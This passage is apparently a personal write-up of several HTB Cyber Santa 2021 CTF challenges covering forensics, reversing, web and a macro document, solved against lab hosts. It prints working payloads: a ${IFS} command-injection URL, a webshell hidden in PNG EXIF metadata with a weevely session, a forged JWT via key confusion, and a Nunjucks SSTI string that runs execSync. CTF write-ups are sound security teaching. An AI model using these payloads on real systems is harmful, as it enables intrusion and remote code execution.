0x3e619578 TCPv6 :: 49152 :: 0 LISTENING 348 wininit.exe N/A
0x3e619cc0 TCPv4 0.0.0.0 49152 0.0.0.0 0 LISTENING 348 wininit.exe N/A
0x3e630008 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
0x3e630008 UDPv6 :: 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
0x3e630a20 TCPv4 0.0.0.0 49156 0.0.0.0 0 LISTENING 408 lsass.exe N/A
0x3e630a20 TCPv6 :: 49156 :: 0 LISTENING 408 lsass.exe N/A
0x3e648508 TCPv4 0.0.0.0 49153 0.0.0.0 0 LISTENING 744 svchost.exe N/A
0x3e648508 TCPv6 :: 49153 :: 0 LISTENING 744 svchost.exe N/A
0x3e6b92c0 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 692 svchost.exe N/A
0x3e6b92c0 TCPv6 :: 135 :: 0 LISTENING 692 svchost.exe N/A
0x3e6b9910 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 692 svchost.exe N/A
0x3e6f0bd8 TCPv4 0.0.0.0 49153 0.0.0.0 0 LISTENING 744 svchost.exe N/A
0x3e75f8e0 TCPv4 0.0.0.0 49154 0.0.0.0 0 LISTENING 888 svchost.exe N/A
0x3e762a40 TCPv4 0.0.0.0 49155 0.0.0.0 0 LISTENING 400 services.exe N/A
0x3e7686e8 TCPv4 0.0.0.0 49154 0.0.0.0 0 LISTENING 888 svchost.exe N/A
0x3e7686e8 TCPv6 :: 49154 :: 0 LISTENING 888 svchost.exe N/A
0x3e8611f0 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 1676 sshd.exe N/A
0x3e8611f0 TCPv6 :: 22 :: 0 LISTENING 1676 sshd.exe N/A
0x3e9be828 TCPv4 0.0.0.0 49156 0.0.0.0 0 LISTENING 408 lsass.exe N/A
0x3ed036c8 UDPv4 10.0.2.15 137 * 0 4 System 2021-11-25 19:12:23.000000
0x3ee98d80 TCPv4 10.0.2.15 49229 147.182.172.189 4444 ESTABLISHED - - -
0x3f1b0df8 TCPv4 10.0.2.15 49216 212.205.126.106 443 ESTABLISHED - - -
0x3f225df8 TCPv4 10.0.2.15 49222 212.205.126.106 443 ESTABLISHED - - -
0x3f2cff50 UDPv4 0.0.0.0 0 * 0 - - 2021-11-25 19:13:04.000000
0x3f2cff50 UDPv6 :: 0 * 0 - - 2021-11-25 19:13:04.000000
0x3f4d7378 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
0x3f4dad28 UDPv4 127.0.0.1 58426 * 0 3344 iexplore.exe 2021-11-25 19:13:31.000000
0x3f520ab8 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
0x3f520ab8 UDPv6 :: 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
0x3f546de8 UDPv4 0.0.0.0 0 * 0 636 VBoxService.ex 2021-11-25 19:14:14.000000
0x3f547008 TCPv4 10.0.2.15 49220 212.205.126.106 443 ESTABLISHED - - -
0x3f561438 TCPv4 10.0.2.15 49215 204.79.197.203 443 ESTABLISHED - - -
0x3f57c438 TCPv4 10.0.2.15 49218 95.100.210.141 443 ESTABLISHED - - -
0x3f58b4c8 TCPv4 10.0.2.15 49217 212.205.126.106 443 ESTABLISHED - - -
0x3f58c748 TCPv4 10.0.2.15 49223 212.205.126.106 443 ESTABLISHED - - -
0x3f58e9d8 TCPv4 10.0.2.15 49225 172.67.177.22 443 ESTABLISHED - - -
0x3f5c6df8 TCPv4 10.0.2.15 49219 95.100.210.141 443 ESTABLISHED - - -

However the IP address 147.182.172.189 is connecting to port 4444 which is used by default for metasploti reverse shells.

Also if we resolve the domain of the malicious URL we can see there are connections to 172.67.177.22 which is normal since the powershell script was downloaded from there.

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$ drill windowsliveupdater.com
;; ->>HEADER<<- opcode: QUERY, rcode: NOERROR, id: 33774
;; flags: qr rd ra ; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;; windowsliveupdater.com. IN A

;; ANSWER SECTION:
windowsliveupdater.com. 300 IN A 104.21.96.108
windowsliveupdater.com. 300 IN A 172.67.177.22

;; AUTHORITY SECTION:

;; ADDITIONAL SECTION:

;; Query time: 34 msec
;; SERVER: 64.6.64.6
;; WHEN: Fri Dec 3 00:12:20 2021
;; MSG SIZE rcvd: 72

The expected flag format is the following:

  1. Find the full URL used to download the malware.
  2. Find the malicious's process ID.
  3. Find the attackers IP

Flag Format: HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum}

So wrapping up all we got so far, I expected the flag to be the md5 hash of one of the first two payload below but it's not, so I tested also a bunch of other.

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https://windowsliveupdater.com/update.ps1_2700_172.67.177.22
https://windowsliveupdater.com/update.ps1_2700_147.182.172.189

https://windowsliveupdater.com/update.ps1_2700_93.184.220.29
https://windowsliveupdater.com/update.ps1_2700_212.205.126.106
https://windowsliveupdater.com/update.ps1_2700_204.79.197.203
https://windowsliveupdater.com/update.ps1_2700_95.100.210.141
https://windowsliveupdater.com/update.ps1_2700_104.21.96.108
https://windowsliveupdater.com/update.ps1_4036_147.182.172.189
https://windowsliveupdater.com/update.ps1_4028_147.182.172.189
https://windowsliveupdater.com/update.ps1_3720_147.182.172.189

In the end I didn't managed to get the flag.

Gift Wrapping - Reversing#

A quick strings on the binaries shows it is packed with UPX.

So let's unpack it: upx -d rev_giftwrap/giftwrap.

Then reverse with radare2/rizin or ioita/cutter.

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$ r2 rev_giftwrap/giftwrap
[0x00401700]> aaa
[0x00401700]> pdf@main

The macro view is that we are asked an input, this input is xored with 0xf3, then an obfuscated function (fcn.00401080) is called with 3 arguments: 0x17, our xored input and and object called CHECK that is likely the xored right value of the flag, then there is a comparison to check if the transformed input match the flag and print a message accordingly.

It's a bit clearer when displayed as a conditional graph.

Checking the decompiled code with the ghidra plugin also allow to understand the behavior.

Now there two ways to solve this challenge and retrieve the flag.

Naive approach#

The quick and easy way is to display the CHECK value while statically analysing the binary and xor it back with 0xf3.

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[0x00401a0b]> psz @obj.CHECK
\xbb\xa7\xb1\x88\x86\x83\x8b\xac\xc7\xc2\x9d\x87\xac\xc6\xc3\xac\x9b\xc7\x81\x97\xd2\xd2\x8e
[0x00401700]> px0 @obj.CHECK
bba7b18886838bacc7c29d87acc6c3ac9bc78197d2d28e
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$ xortool-xor -h bba7b18886838bacc7c29d87acc6c3ac9bc78197d2d28e -h f3
HTB{upx_41nt_50_h4rd!!}

Elegant approach#

The more difficult but elegant solution is to dynamically debug and interact with the binary.

First we launch the binary in debug mode and set two breakpoints:

  • 0x004019b1: one after the scanf() to be able to overwrite the stack and repalce the placeholder input with the xord flag.
  • 0x00401a0b: one before the comparision (before Welcome inside... or Wrong password! Who are you?!? is displayed and the program quits) to be able to inspect the value of the plaintext flag.
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$ r2 -d rev_giftwrap/giftwrap
[0x00401700]> aaa
[0x00401700]> pdf@main
[0x00401700]> db 0x004019b1
[0x00401700]> db 0x00401a0b

Then we start the program and input a placeholder value that has the same size (23 bytes) as the flag.

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[0x00401700]> dc
What's the magic word? AAAAAAAAAAAAAAAAAAAAAAA
hit breakpoint at: 0x401a0b

Note: to find the size of the flag we just have read obj.CHECK, here I substract one to remove the size of the string terminator (0x00) and divide by two because it is printed in hexadecimal.

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[0x00401700]> px0 @obj.CHECK | ruby -e 'puts (STDIN.read.size - 1)/2'
23

The we display the stack (rsp) and see that it contains the 23 A placeholder after an offset of 16 bytes (0x10).

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[0x004019de]> pxr@rsp
0x7ffcf8190b90 ..[ null bytes ].. 00000000 rsp
0x7ffcf8190b98 0x00000000f8190c20 ....... 4162391072
0x7ffcf8190ba0 0x4141414141414141 AAAAAAAA ascii ('A')
0x7ffcf8190ba8 0x4141414141414141 AAAAAAAA ascii ('A')
0x7ffcf8190bb0 0x0041414141414141 AAAAAAA. ascii ('A')
0x7ffcf8190bb8 ..[ null bytes ].. 00000000

So let's rewrite the stack and replace the placeholder by the xored flag:

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[0x004019de]> w $(psz @obj.CHECK) @ rsp+0x10
[0x004019de]> pxr@rsp
0x7ffd17ee5e10 ..[ null bytes ].. 00000000 rsp
0x7ffd17ee5e18 0x0000000017ee5ea0 .^...... 401497760
0x7ffd17ee5e20 0xac8b838688b1a7bb ........
0x7ffd17ee5e28 0xacc3c6ac879dc2c7 ........
0x7ffd17ee5e30 0x008ed2d29781c79b ........
0x7ffd17ee5e38 ..[ null bytes ].. 00000000

The CHECK object seems read the flag from rsi.

So we just have to read the value of rsi after the check before the comparison and jump.

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[0x004019b1]> dc
hit breakpoint at: 0x401a0b
[0x00401a0b]> dr rsi
0x7fffc8f8db90
[0x00401a0b]> psz @rsi
HTB{upx_41nt_50_h4rd!!}\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3\xf3

This method is more complex but would be handful if the obfuscation was harder than a XOR or if that obj.CHECK couldn't be read directly.

Sleigh - Pwn#

I didn't do it.

Day 3 - 03/12/2021#

Gadget Santa - Web#

Source code review#

On the web app home page we can run command through get parameters like that http://178.128.35.132:30784/?command=ups_status.

The command is received like that by the controller in challenge/controllers/MonitorController.php

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<?php
class MonitorController
{
public function index($router)
{
$command = isset($_GET['command']) ? $_GET['command'] : 'welcome';
$monitor = new MonitorModel($command);
return $router->view('index', ['output' => $monitor->getOutput()]);
}
}

The received command is used to build a model (challenge/models/MonitorModel.php)

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<?php
class MonitorModel
{
public function __construct($command)
{
$this->command = $this->sanitize($command);
}

public function sanitize($command)
{
$command = preg_replace('/\s+/', '', $command);
return $command;
}

public function getOutput()
{
return shell_exec('/santa_mon.sh '.$this->command);
}
}

On init the model MonitorModel wil call the function sanitize() that remove all whitespaces. The when the view is rendered the function getOutput() is called and will execute the system script santa_mon.sh where our command will be passed as argument.

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#!/bin/bash

ups_status() {
curl localhost:3000;
}

restart_ups() {
curl localhost:3000/restart;
}

list_processes() {
ps -ef
}

list_ram() {
free -h
}

list_connections() {
netstat -plnt
}

list_storage() {
df -h
}

welcome() {
echo "[+] Welcome to Santa's Monitor Gadget!"
}

if [ "$#" -gt 0 ]; then
$1
fi

But nothing prevent us to perform an RCE, we do not need whitespaces for that, for example we can chain the commands:

http://178.128.35.132:30784/?command=ups_status;id

output:

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{"status": "running"}uid=1000(www) gid=1000(www) groups=1000(www)

Looking in config/ups_manager.py we can see there is another web application running on localhost that is used to get the UPS status but this app has an interresting route for us: get_flag

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def http_server(host_port,content_type="application/json"):
class CustomHandler(SimpleHTTPRequestHandler):
def do_GET(self) -> None:
def resp_ok():
self.send_response(200)
self.send_header("Content-type", content_type)
self.end_headers()
if self.path == '/':
resp_ok()
if check_service():
self.wfile.write(get_json({'status': 'running'}))
else:
self.wfile.write(get_json({'status': 'not running'}))
return
elif self.path == '/restart':
restart_service()
resp_ok()
self.wfile.write(get_json({'status': 'service restarted successfully'}))
return
elif self.path == '/get_flag':
resp_ok()
self.wfile.write(get_json({'status': 'HTB{f4k3_fl4g_f0r_t3st1ng}'}))
return
self.send_error(404, '404 not found')
def log_message(self, format, *args):
pass
class _TCPServer(TCPServer):
allow_reuse_address = True
httpd = _TCPServer(host_port, CustomHandler)
httpd.serve_forever()

But we cant just run http://178.128.35.132:30784/?command=ups_status;curl localhost:3000/get_flag like that because the whitespace will be removed by the sanitize function.

Exploitation: security bypass#

To bypass the sanitize function we'll use IFS - Internal field separator.

http://178.128.35.132:30784/?command=ups_status;curl${IFS}localhost:3000/get_flag

output:

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{"status": "running"}{"status": "HTB{54nt4_i5_th3_r34l_r3d_t34m3r}"}

Naughty List - Pwn#

I didn't do it.

Missing Reindeer - Crypto#

I didn't do it.

Intercept - Reversing#

I didn't do it.

Persist - Forensics#

I didn't do it.

Day 4 - 04/12/2021#

Elf Directory - Web#

For this challenge we do not have the source code.

We can register an account, log in, and see our pofile on read-only mode with the following message:

You don't have permission to edit your profile, contact the admin elf to approve your account!

We have no way to contat the admin for now.

I used ctf-party to decode and re-encode our cookie trying to become an approved user.

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$ ctf-party 'eyJ1c2VybmFtZSI6Im5vcmFqIiwiYXBwcm92ZWQiOmZhbHNlfQ%3D%3D' urldecode from_b64
{"username":"noraj","approved":false}
$ ctf-party '{"username":"noraj","approved":true}' to_b64 urlencode
eyJ1c2VybmFtZSI6Im5vcmFqIiwiYXBwcm92ZWQiOnRydWV9

It works, we now are able to modify our profile.

Upload#

We can't upload a webshell even when modifying the extention + content type + adding the PNG magic bytes.

So let's upload some legit PNG files to find the upload path and see if the files are renamed after upload. Maybe our webshell was not removed even if we received an error for invalid files.

I uploaded two times the same image that was partially renamed:

So 5 random hexadecimal characters were prepended, we can bruteforce to see if our webshell is present on the web server or not.

I tried the about 1M possibilities but it seems invalid files are removed and there are too much possibilities to perform a race condition.

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$ cook hex:hex:hex:hex:hex:_agent.php -config-path /usr/share/cook/cook.yaml | ffuf -u http://178.62.75.187:31547/uploads/FUZZ -w -

So I though about using the same technique as during ECSC 2019 Quals Team France: embedding a webshell in exif metadata:

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$ exiftool -documentname="$(cat agent.php| tr '\n' ' ')" noraj.png

I have a hidden webshell at http://178.62.75.187:31547/uploads/2e5ea_noraj.png.php

RCE successful:

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$ weevely http://178.62.75.187:31547/uploads/2e5ea_noraj.png.php noraj

[+] weevely 4.0.1

[+] Target: 178.62.75.187:31547
[+] Session: /home/noraj/.weevely/sessions/178.62.75.187/2e5ea_noraj.png_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> id
uid=1000(www) gid=1000(www) groups=1000(www)
webelfdirectory-1225-667cc6cfcd-772pc:/www/uploads $

Grab the flag:

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$ webelfdirectory-1225-667cc6cfcd-772pc:/www/uploads $ cat /flag_65890d927c37c33.txt
HTB{br4k3_au7hs_g3t_5h3lls}

Minimelfistic - Pwn#

I didn't do it.

Meet Me Halfway - Crytpo#

I didn't do it.

Upgraded - Reversing#

I didn't do it.

Giveaway - Forensics#

We have a to face a MS word document including macro .docm.

We can extract the archive:

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$ 7z x christmas_giveaway.docm

We can see word/vbaData.xml which describe the macros and the macro compiled as a binary itself word/vbaProject.bin.

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<wne:mcds>
<wne:mcd wne:macroName="PROJECT.THISDOCUMENT.AUTO_OPEN" wne:name="Project.ThisDocument.Auto_Open" wne:bEncrypt="00" wne:cmg="56"/>
<wne:mcd wne:macroName="PROJECT.THISDOCUMENT.H" wne:name="Project.ThisDocument.h" wne:bEncrypt="00" wne:cmg="56"/>
<wne:mcd wne:macroName="PROJECT.THISDOCUMENT.AUTOOPEN" wne:name="Project.ThisDocument.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/>
<wne:mcd wne:macroName="PROJECT.THISDOCUMENT.WORKBOOK_OPEN" wne:name="Project.ThisDocument.Workbook_Open" wne:bEncrypt="00" wne:cmg="56"/>
<wne:mcd wne:macroName="PROJECT.THISDOCUMENT.FINDTEST" wne:name="Project.ThisDocument.findTest" wne:bEncrypt="00" wne:cmg="56"/>
<wne:mcd wne:macroName="PROJECT.THISDOCUMENT.SECONDTEST" wne:name="Project.ThisDocument.secondTest" wne:bEncrypt="00" wne:cmg="56"/>
</wne:mcds>

We can decompile the macro with pcode2code.

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$ pcode2code christmas_giveaway.docm > macro.vbs

The part of the code interesting us that we need to deobfuscate is the following.

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Dim strFileURL, HPkXUcxLcAoMHOlj, cxPZSGdIQDAdRVpziKf, fqtSMHFlkYeyLfs, ehPsgfAcWaYrJm, FVpHoEqBKnhPO As String

HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4"
cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10)
fqtSMHFlkYeyLfs = Replace("everybody", "e", "3")
fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_"
ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95)
FVpHoEqBKnhPO = Replace("christmas", "i", "1")
FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6)

Doing it manually gives us the flag.

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HTB{Th1s_1s_4_pr3s3nt_3v3ryb0dy_w4nts_f0r_chr1stm4s}

Day 5 - 05/12/2021#

Naughty or Nice - Web#

By reading the routes source code at challenge/routes/index.js we understand most endpoints are retricted to user admin.

For exmaple:

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router.post('/api/elf/edit', AuthMiddleware, async (req, res) => {
return db.getUser(req.data.username)
.then(user => {
if(user.username != 'admin') return res.status(403).send(response('Access denied'));
const {elf_name, type, editelf_id} = req.body;
if (elf_name, type, editelf_id) {
if (type != 'nice' && type != 'naughty') return res.status(403).send(response('The type has to be either "nice" or "naughty"!'));
return db.editName(elf_name, type, editelf_id)
.then(() => res.send(response('Elf details updated successfully!')))
.catch(() => res.status(500).send(response('Something went wrong, please try again!')));
}
res.status(403).send(response('Missing required parameters, make sure to fill out all the fields!'));
})
.catch(() => res.status(500).send(response('Something went wrong!')));
});

To try to become admin I tried some SQL truncation on the username at registration (VARCHAR(255)) but it didn't work.

There is a JWT token, and either by decoding it or reading the source code challenge/helpers/JWTHelper.js we see the data section contains a public key, which is unusual.

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$ jwt-tool eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im5vcmFqIiwicGsiOiItLS0tLUJFR0lOIFBVQkxJQyBLRVktLS0tLVxuTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUFzK1kwZ0lORVdlYkZML1N3R3lpR1xuOS9oSU91VGxYajNiTnM0U3dXRHhPc2V4WWN1NlBOUS9qZmZNQjYyZm9BclQxbTAwQ2V4QnVNWGRRRWxnemJ5NFxubjNYZkE0ZVNwdFlWMDlnTStuYXAxT2p4cDZWMjF1NUxjalJMZ2VycDZRcHBBZDFJMitMZzcxVXVaa25BUVBMYVxuUy9sZ1ZIbzVHTWMyWnVPQXVKUEQxYVErQ0N0ZGFOUy9qcWpnSVRRdEI1VkNrSjlTM0ltUkp3RHk0b2VxcG1rUlxuYnVydmRoSDZXVmtDVDc3TmthSnpudFFiNW9DOFBnODgvczFDTGk1S2JoQ0Ruam54T3R3ekQyNE5zQUhlRnlxWlxuSzRiby9WNXlPOGUyVXNCRjQzdWZxK09MeHRuWGgwMVZ2YnFVRnY2YWZ0ZDRzb1pGd3Y0SVpWOG5sOWdIb0tUK1xuWHdJREFRQUJcbi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLSIsImlhdCI6MTYzODcyNDIzNn0.qQKaGpRXCgSe3daQwKuJo-yp-seXnqpujsEa9923GeelrGwmLtT6DlG0lF5-HFMzhF6TSj0OQ4VUh_qvgK4xDLZGk-VKVPCn4b0YX5Vcf7-Sia5-G_hmZGnSny7CV9TwS3ceykDsaR3eDxcFFna19yVTJsrat8XRuWF5ywOhUrEAaY5Rg2GoL7jXuNHxMWO0QKwHPGbJ7IqN0zB5pmw_8PSXejJZMyWqISS5xYClirs9239GCvIIg5d1U86nibZxSaZrREOZDfZ0xsml7RdirNL17bJvNm8NlpjUKPslj4OZS3lVfiLaTaN1xkP4GINuvsDPFEbQLEu6s0CEhmAj-Q

Original JWT:

=====================
Decoded Token Values:
=====================

Token header values:
[+] alg = "RS256"
[+] typ = "JWT"

Token payload values:
[+] username = "noraj"
[+] pk = "-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAs+Y0gINEWebFL/SwGyiG
9/hIOuTlXj3bNs4SwWDxOsexYcu6PNQ/jffMB62foArT1m00CexBuMXdQElgzby4
n3XfA4eSptYV09gM+nap1Ojxp6V21u5LcjRLgerp6QppAd1I2+Lg71UuZknAQPLa
S/lgVHo5GMc2ZuOAuJPD1aQ+CCtdaNS/jqjgITQtB5VCkJ9S3ImRJwDy4oeqpmkR
burvdhH6WVkCT77NkaJzntQb5oC8Pg88/s1CLi5KbhCDnjnxOtwzD24NsAHeFyqZ
K4bo/V5yO8e2UsBF43ufq+OLxtnXh01VvbqUFv6aftd4soZFwv4IZV8nl9gHoKT+
XwIDAQAB
-----END PUBLIC KEY-----"
[+] iat = 1638724236 ==> TIMESTAMP = 2021-12-05 18:10:36 (UTC)

----------------------
JWT common timestamps:
iat = IssuedAt
exp = Expires
nbf = NotBefore
----------------------

Having the public key corresponding to the private key used to sign the JWT token gave me the idea to tamper it and perform a key confusion attack to spoof the admin identity.

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$ jwt-tool -pk noraj.pem -I -pc username -pv admin -X k eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im5vcmFqIiwicGsiOiItLS0tLUJFR0lOIFBVQkxJQyBLRVktLS0tLVxuTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUFzK1kwZ0lORVdlYkZML1N3R3lpR1xuOS9oSU91VGxYajNiTnM0U3dXRHhPc2V4WWN1NlBOUS9qZmZNQjYyZm9BclQxbTAwQ2V4QnVNWGRRRWxnemJ5NFxubjNYZkE0ZVNwdFlWMDlnTStuYXAxT2p4cDZWMjF1NUxjalJMZ2VycDZRcHBBZDFJMitMZzcxVXVaa25BUVBMYVxuUy9sZ1ZIbzVHTWMyWnVPQXVKUEQxYVErQ0N0ZGFOUy9qcWpnSVRRdEI1VkNrSjlTM0ltUkp3RHk0b2VxcG1rUlxuYnVydmRoSDZXVmtDVDc3TmthSnpudFFiNW9DOFBnODgvczFDTGk1S2JoQ0Ruam54T3R3ekQyNE5zQUhlRnlxWlxuSzRiby9WNXlPOGUyVXNCRjQzdWZxK09MeHRuWGgwMVZ2YnFVRnY2YWZ0ZDRzb1pGd3Y0SVpWOG5sOWdIb0tUK1xuWHdJREFRQUJcbi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLSIsImlhdCI6MTYzODcyNDIzNn0.qQKaGpRXCgSe3daQwKuJo-yp-seXnqpujsEa9923GeelrGwmLtT6DlG0lF5-HFMzhF6TSj0OQ4VUh_qvgK4xDLZGk-VKVPCn4b0YX5Vcf7-Sia5-G_hmZGnSny7CV9TwS3ceykDsaR3eDxcFFna19yVTJsrat8XRuWF5ywOhUrEAaY5Rg2GoL7jXuNHxMWO0QKwHPGbJ7IqN0zB5pmw_8PSXejJZMyWqISS5xYClirs9239GCvIIg5d1U86nibZxSaZrREOZDfZ0xsml7RdirNL17bJvNm8NlpjUKPslj4OZS3lVfiLaTaN1xkP4GINuvsDPFEbQLEu6s0CEhmAj-Q

Original JWT:

File loaded: noraj.pem
jwttool_401db23acc193bab2f34eeb0bef34322 - EXPLOIT: Key-Confusion attack (signing using the Public Key as the HMAC secret)
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGsiOiItLS0tLUJFR0lOIFBVQkxJQyBLRVktLS0tLVxuTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUFzK1kwZ0lORVdlYkZML1N3R3lpR1xuOS9oSU91VGxYajNiTnM0U3dXRHhPc2V4WWN1NlBOUS9qZmZNQjYyZm9BclQxbTAwQ2V4QnVNWGRRRWxnemJ5NFxubjNYZkE0ZVNwdFlWMDlnTStuYXAxT2p4cDZWMjF1NUxjalJMZ2VycDZRcHBBZDFJMitMZzcxVXVaa25BUVBMYVxuUy9sZ1ZIbzVHTWMyWnVPQXVKUEQxYVErQ0N0ZGFOUy9qcWpnSVRRdEI1VkNrSjlTM0ltUkp3RHk0b2VxcG1rUlxuYnVydmRoSDZXVmtDVDc3TmthSnpudFFiNW9DOFBnODgvczFDTGk1S2JoQ0Ruam54T3R3ekQyNE5zQUhlRnlxWlxuSzRiby9WNXlPOGUyVXNCRjQzdWZxK09MeHRuWGgwMVZ2YnFVRnY2YWZ0ZDRzb1pGd3Y0SVpWOG5sOWdIb0tUK1xuWHdJREFRQUJcbi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLSIsImlhdCI6MTYzODcyNDIzNn0.vYaQurOdvoY9iUcBBsbrtVvjWuvY7bvcMhl-UbXpX9c

Using the tampered cookie I can authenticate as admin. We have access to more features but we still need to find a way to read a system file (/flag.txt as seen in Dockerfile).

I took a look at dependencies and saw nothing obvious so it's time to use tools.

With npm-check-updates I saw a few dependencies were outdated. So maybe one of them is vulnerable.

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$ ncu
Checking /home/noraj/CTF/HTB_Cyber_Santa_2021/Naughty_or_Nice/web_naughty_or_nice/challenge/package.json
[====================] 7/7 100%

cookie-parser ^1.4.4 β†’ ^1.4.6
nunjucks ^3.2.0 β†’ ^3.2.3
sqlite-async ^1.1.1 β†’ ^1.1.2
nodemon ^2.0.2 β†’ ^2.0.15

Run ncu -u to upgrade package.json

nunjucks is a templating engine so it's prone to RCE or LFI if it's vulnerable.

I check on Snyk vulnerability DB and found that this version was vulnerable to a prototype pollution attack: https://security.snyk.io/vuln/SNYK-JS-NUNJUCKS-1079083

Here is the upstream vulnerability report: https://github.com/mozilla/nunjucks/issues/1331

Editing an elf name and replacing it's name by {{ 7*7 }} (/api/elf/edit), we can then see on the main page using the vulnerable card helper the number 49, proving the SSTI. So it's different from the prototype polution but it put us on the way to abuse the templating engine.

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router.get('/', (req, res) => {
return db.listNames()
.then(elfList => {
return CardHelper.generateCard(elfList)
.then(cardHTML => {
return res.send(cardHTML);
})
.catch(() => res.status(500).send(response('Something went wrong!')));
});
});

challenge/helpers/CardHelper.js:

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const nunjucks   = require('nunjucks');

module.exports = {
async generateCard(elfList) {
return new Promise(async (resolve, reject) => {
try {
let NaughtyNames = NiceNames = '<br>';
for(elfData of elfList) {
if (elfData.type == 'naughty') {
NaughtyNames = `${NaughtyNames}\n${elfData.elf_name}<br>`;
}
else if (elfData.type == 'nice') {
NiceNames = `${NiceNames}\n${elfData.elf_name}<br>`;
}
}
card = `
{% extends "card.html" %}
{% block card %}
<div class="card">
<div class="card-page cart-page-front">
<div class="card-page cart-page-outside"></div>
<div class="card-page cart-page-inside">
<p><span class='nheader green'>Nice List</span>
${NiceNames}
</p>
</div>
</div>
<div class="card-page cart-page-bottom">
<p><span class='nheader red'>Naughty List</span>
${NaughtyNames}
</p>
</div>
</div>
{% endblock %}
`;
resolve(nunjucks.renderString(card));
} catch(e) {
reject(e);
}
})
}
};

So let's find a valid RCE payload, I found one in a nuclei template: https://github.com/geeknik/the-nuclei-templates/blob/main/node-nunjucks-ssti.yaml

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{{ range.constructor("return global.process.mainModule.require('child_process').execSync('cat /flag.txt')")() }}

That gives us the flag HTB{S4nt4_g0t_ninety9_pr0bl3ms_but_chr1stm4s_4in7_0n3}.

Music Notes - Pwn#

I didn't do it.

Warehouse Maintenance - Crypto#

I didn't do it.

Bamboozled - Reversing#

I didn't do it.

Ho Ho Ho - Forensics#

I didn't do it.

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